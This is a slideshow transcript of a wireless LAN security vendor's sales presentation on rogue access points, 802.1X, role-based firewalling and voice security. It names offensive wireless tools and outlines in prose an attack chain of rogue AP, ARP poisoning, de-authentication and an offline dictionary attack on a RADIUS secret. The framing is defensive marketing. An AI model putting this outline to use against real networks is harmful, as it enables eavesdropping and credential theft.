getting smart about wireless security n.
Download
Skip this Video
Loading SlideShow in 5 Seconds..
Getting Smart About Wireless Security PowerPoint Presentation
Download Presentation
Getting Smart About Wireless Security

Loading in 2 Seconds...

play fullscreen
1 / 47

Getting Smart About Wireless Security - PowerPoint PPT Presentation


  • 130 Views
  • Uploaded on

Getting Smart About Wireless Security. The Existence of Wireless LANs is a Security Threat – A Case Study. New York City. Your Company. Your employee. Employee’s a subscriber to public Wi-Fi hotspot service Employee’s laptop automatically associates with public Wi-Fi hotspot

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about 'Getting Smart About Wireless Security' - akando


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
the existence of wireless lans is a security threat a case study
The Existence of Wireless LANs is a Security Threat – A Case Study

New York City

Your

Company

Your

employee

  • Employee’s a subscriber to public Wi-Fi hotspot service
  • Employee’s laptop automatically associates with public Wi-Fi hotspot
  • Plugs into wired corporate network
  • Traffic bridged between public hotspot and enterprise network
slide3
Mobility Is An Interior Security ThreatConventional Perimeter Security Has Been Rendered Irrelevant
  • Wireless LAN technology is a wired security threat
  • New mobile users, devices appearing everyday
  • Traditional security products do not work for mobility
    • Insecure, poor performance, expensive, breaks mobility
  • Security needs to be addressed from the inside out
slide4
Aruba Solution: Internal Mobile SecurityConventional Perimeter Security Has Been Rendered Irrelevant

5. LOCK THE RESOURCES

4. LOCK THE DEVICE

3. LOCK THE USER

2. LOCK THE WIRE

1. LOCK THE AIR

aruba at a glance at the intersection of mobility wireless and security
Aruba At A GlanceAt the Intersection of Mobility, Wireless and Security
  • Founded: February, 2002
  • Investors: Sequoia, Matrix, Trinity, WK Technology
  • Funding: $77M To-Date , Nearing Profitability
  • Traction: Hundreds of Major Customers
  • Employees: 130
  • Patents: Multiple Key Patents
  • Industry Recognition:
aruba s centralized security solutions security from the inside out

CORPORATENETWORK

Employees

INTERNET

ACCESS

Visitors

VOIPSERVICES

Voice

Open

Ports

Guest

Laptop

Aruba’s Centralized Security SolutionsSecurity from the Inside Out

Email,

Web,

Storage

Servers

OSDP

Partners

IPTransport

Lock The Air

Easy Deployment of Secure WLAN

Plug Holes in Exposed WLANs

Protect Users, Devices, Networks from Worms and Viruses

Create & Enforce Corporate Policies

Defend Exposed Wired Ports

how it s deployed non disruptive to existing network

ARUBA 2400

How It’s Deployed:Non-disruptive to Existing Network

DATA CENTER DEPLOYMENT

WIRING CLOSET DEPLOYMENT

FLOOR 1

FLOOR 1

ARUBA 800

FLOOR 2

FLOOR 2

10/100 Mbps

10/100 Mbps

DATA CENTER

DATA CENTER

ARUBA 5000

BACKBONE

BACKBONE

intrusion detection and prevention
Intrusion Detection and Prevention

Hackers Can Trap Users, Grab Data and

Pretend to be Valid Users

Wireless Intrusion Detection
a myriad of intrusion tools techniques

Monkey Jack

Associate Flood

ESSID Jack

Void 11

AirJack

Auth Flood

Wellenreiter

ASLEAP

HostAP

KISMET

FakeAP Flood

WLAN Jack

Ttcp-WiFi

DeAuth Flood

A Myriad of Intrusion Tools / Techniques
aruba solution internal mobile security defense in depth locking down in layers
Aruba Solution: Internal Mobile SecurityDefense In Depth: Locking Down In Layers

5. LOCK THE RESOURCES

4. LOCK THE DEVICE

3. LOCK THE USER

2. LOCK THE WIRE

1. LOCK THE AIR

getting your radius password is simple
Getting Your RADIUS Password is Simple
  • Hacker finds rogue access point before you do

Uses ARP poisoning to sniff all the traffic between the AP and the gateway

RADIUS Server

Sends a De-authentication packet to a client

De-Auth

getting your radius password is simple1

How safe are your

RADIUS passwords?

Getting Your RADIUS Password is Simple
  • Hacker finds rogue access point before you do

Uses ARP poisoning to sniff all the traffic between the AP and the gateway

Access Challenge

RADIUS Server

Sends a de-authentication packet to a client

Client automatically re-authenticates

AP sends requests to the RADIUS server

With just 2 packets and less than 1 second with a rogue AP, a hacker can perform an offline dictionary attack on your RADIUS server shared secret

Access Request

?

so is getting all your data

Access Accept

How safe is your data?

So Is Getting ALL Your Data

Client finishes authentication and the AP sends the request to the RADIUS server

RADIUS Server

RADIUS server accepts the user, and passes the encrypted keys to the AP

Since the hacker will find out your RADIUS password, they will know your dynamic WEP keys too!

Access Request

With your WEP keys, all traffic can be sniffed directly.

safety with aruba rogue prevention
Safety with Aruba (Rogue Prevention)
  • AP detection
    • See all APs
  • AP classification
    • Are they neighbors?
    • Or are they a threat?
  • Rogue destruction
    • Stop users from accessing rogue APs and leave neighbors alone
safety with aruba centralized encryption

Access Accept

Safety with Aruba (Centralized Encryption)

Client finishes authentication and the AP sends the wireless packet to the switch

The switch sends an access request to the RADIUS server

RADIUS Server

The RADIUS server sends the accept and encrypted keys to the switch

Access Request

All encryption is processed centrallyNO keys are distributed to APs

Your keys never leave

the data center

aruba solution internal mobile security defense in depth locking down in layers1
Aruba Solution: Internal Mobile SecurityDefense In Depth: Locking Down In Layers

5. LOCK THE RESOURCES

4. LOCK THE DEVICE

3. LOCK THE USER

2. LOCK THE WIRE

1. LOCK THE AIR

authenticating the user 802 1x
Authenticating The User (802.1X)

802.1x supplicant

  • 802.1X support for explicit and stateful modes
  • 802.11 Encryption
    • WEP -- static and 802.1X dynamic WEP
    • TKIP
    • AES
  • 802.11 Authentication methods
    • EAP-PEAP (Cisco and Microsoft versions)
    • EAP-LEAP (Cisco)
    • EAP-TLS & EAP-TTLS
  • Extensive support for 3rd party authentication servers

Contractor

Employee

802.1X

authenticator

Authentication server

other authentication methods
Other Authentication Methods
  • For Fat and Thin APs:
    • Wireless VPNs
    • Captive Portal/Web Authentication
    • Stateful 802.1X Authentication (For Fat APs)
    • MAC Authentication (For Dumb Devices)
wireless vpns layer 3 from the dmz to the intranet
Wireless VPNs (Layer 3) From the DMZ to the Intranet

DMZ

Enterprises have sacrificed scalability for security

Mobility limited to a single VLAN

wireless vpns mobility mandates new model to ensure privacy
Remote access vs. Internal access

Low speed (Mbps) vs. High Speed (Gbps)

Fixed user vs.mobile user

VPN Client vs. VPN Dialer

RASVPNs

WLANVPNs

Wireless VPNsMobility Mandates New Model To Ensure Privacy

INTERNET

rsa certification for 2 factor authentication
RSA Certification for 2-factor Authentication
  • Industry’s most prestigious security certification for two-factor authentication
  • Aruba extends certification with SecurID caching
  • Critical in environments where two-factor authentication is mandated
  • 365/24/7 RSA support for customers using tokens on Aruba products
aruba solution internal mobile security defense in depth locking down in layers2
Aruba Solution: Internal Mobile SecurityDefense In Depth: Locking Down In Layers

5. LOCK THE RESOURCES

4. LOCK THE DEVICE

3. LOCK THE USER

2. LOCK THE WIRE

1. LOCK THE AIR

dual stage authentication ensures only authorized devices can be used to access network

Corporate

Laptop

Personal

Laptop

FAIL

PASS

Dual Stage AuthenticationEnsures Only Authorized Devices Can Be Used to Access Network
  • Aruba enforces machine authentication before user authentication
  • If the device cannot be authenticated, Aruba denies user(s) access or places in restricted role even if valid username and password has been provided
  • Ideal for protecting against personal computers that are likely to be infected with viruses

RADIUS

Domain

Controller

Same U/N and Password

what s device remediation

Same Corporateemployee

What’s Device Remediation ?

Corporateemployee

  • Ensuring endpoint integrity through automatic security checks
  • Protecting the network from viruses by requiring stations to pass pre-defined security policies before entering the network
    • Pass = network access
    • Fail = redirection to URL for remediation
  • Reduces enterprise exposure to security vulnerabilities and targeted attacks
device remediation with zone labs

Quarantine

4

Healthy

1

3

2

Device Remediation with Zone Labs

Zone Integrity

client

1. Pre-defined security policies defined at Zone Integrity server

MSFT 802.1x

supplicant

2. Upon entering network, user authentication, via 802.1X, is initiated

3. Once authenticated,users are sent to Zone Labs Integrity server for security testing

4. If user passes security checks, network access is allowed. If user fails, Aruba Wi-Fi switch redirects to URL for remediation or firewalls user into group with restricted access

Zone Labs

Integrity

server

Funk SBR 802.1x authentication server

other remediation partnerships
Other Remediation Partnerships
  • Sygate
  • Infoexpress (in progress)
  • Senforce (in progress)
aruba solution internal mobile security defense in depth locking down in layers3
Aruba Solution: Internal Mobile SecurityDefense In Depth: Locking Down In Layers

5. LOCK THE RESOURCES

4. LOCK THE DEVICE

3. LOCK THE USER

2. LOCK THE WIRE

1. LOCK THE AIR

locking the resources what does it mean

CORPORATENETWORK

Employees

INTERNET

ACCESS

Visitors

VOIPSERVICES

Voice

Locking the Resources: What Does It Mean?

IPTransport

Centralized

Wireless LAN

Security

Programmable

Access Points

  • Enable Secure Network Access Based On[Who, What, When, Where, How]
step 1 role based separation
Step 1: Role-based Separation

Trusted user, Trusted host

Radius Server

Trusted user, Un-trusted host

Virtual AP 1

SSID: CORP

Un-trusted user

Firewall

Guest user

Virtual AP 2

SSID: GUEST

Layer 2 Switch

Router

CaptivePortal

Firewall

DHCPPool

Default VLAN

Aruba Access Point

Aruba WLAN Switch

step 2 stateful traffic policies
Step 2: Stateful Traffic Policies
  • Built-in ICSA Certified Stateful Firewall
  • Brings Application Awareness
result integrated mobile security mobile security policies based on who what when where how

USERNAME

John Doe

PASSWORD

<Cached Identity>

ROLE

Employee

AUTHENTICATION

RSA SecurID

FIREWALL POLICY

Don’t allow on Finance Subnets

USERNAME

John Doe

PASSWORD

<One Time Password>

ROLE

Employee

AUTHENTICATION

RSA SecurID

FIREWALL POLICY

Don’t allow on Finance Subnets

Result: Integrated Mobile SecurityMobile Security Policies based on {Who, What, When, Where, How}

Subnet A

Wired Intranet

Subnet B

vowlan security issues
VoWLAN Security Issues
  • All 802.11 DoS/MITM attacks apply to voice
  • VOIP devices don’t use latest encryption or authentication methods
  • MAC-based authentication can be compromised
  • Handsets can be stolen/hijacked
  • SSIDs set aside for voice can be accessed
weak voice without aruba
Weak Voice without Aruba
  • Hacker discovers “Voice” SSID, cracks WEP key
  • Spoofs MAC address to gain access

ESSID=Voice

WEP

strong voice with voice flow classification
Strong Voice With Voice Flow Classification
  • Voice policies can be created that only allow specific traffic types (eg. SVP or SIP) while denying all others
  • If unauthorized traffic is discovered the station can be automatically blacklisted
voice flow classification technology
Voice Flow Classification Technology
  • Uniquely identifies, classifies and prioritizes voice traffic
  • Based on Aruba’s user-aware stateful firewall engine
  • Pre-configured support for Voice Protocols
    • Spectralink Voice Priority (SVP)
    • Session Initiation Protocol (SIP)
    • H.323
  • Voice traffic from a PDA or laptop can now be automatically identified, classified and prioritized

DATA

VOICE

security tco solving costly integration

RF sniffers

Intranet

Firewall

Wireless

manager

Wireless IDS

$40K

$49K

$84K

$9K

VPN

concentrator

Security TCO: Solving Costly Integration
  • Start with a LAN
  • Add APs and wireless users
  • Add a firewall to isolate wireless from wired
  • Plus a VPN server to protect wireless traffic
  • And something to manage the APs
  • What about wireless intruders?
  • Aruba APs are also functions as sniffers
  • Aruba’s WLAN system integrates a firewall
  • …and a VPN concentrator
  • …and wireless intrusion protection
  • …and RF management and optimization
  • …and centralized management and policy controls

$20K

Internet

extending to open wired ports mobile security from the inside out for wired and wireless

CORPORATENETWORK

Employees

INTERNET

ACCESS

Visitors

VOIPSERVICES

Voice

Extending to Open Wired PortsMobile Security from the Inside Out for Wired and Wireless

IPTransport

Centralized

Security

System

Open Wired Ports

Extend Policies To All Open Ports Based On[Who, What, Where, When, How]

slide44

INTEGRATED SWITCHES WIRELESS & SECURITY

ARUBA 2400

ARUBA 800

REMOTE MANAGEABILITY

A Complete Wi-Fi System in a Single, Scalable Network PlatformFrom System Integration to an Integrated System

Firewall

VPN

Gateway

WirelessIntrusionDetection

Distributed

Wireless

Sniffers

RF SpectrumManagement

Voice

slide45
Purpose-Built for Wireless Security ProcessingUnique Architecture Enables New Wireless Applications

Wireless

Control

Processor

Wireless

Packet

Processor

Wireless

Security

Processor

L2/L3

Switch with Serial & Power over Ethernet (SPOE)

why aruba

Cheaper

Faster

Better

  • Dense deployments
  • Centralized radio calibration
  • High-performance switching
  • Real-time air monitoring and performance optimization
  • Centralized switching, thin APs
  • Dynamic AP management
  • Out-of-ceiling deployment
  • Enterprise-class switching platform
  • Programmable APs
  • Modular software architecture
Why Aruba?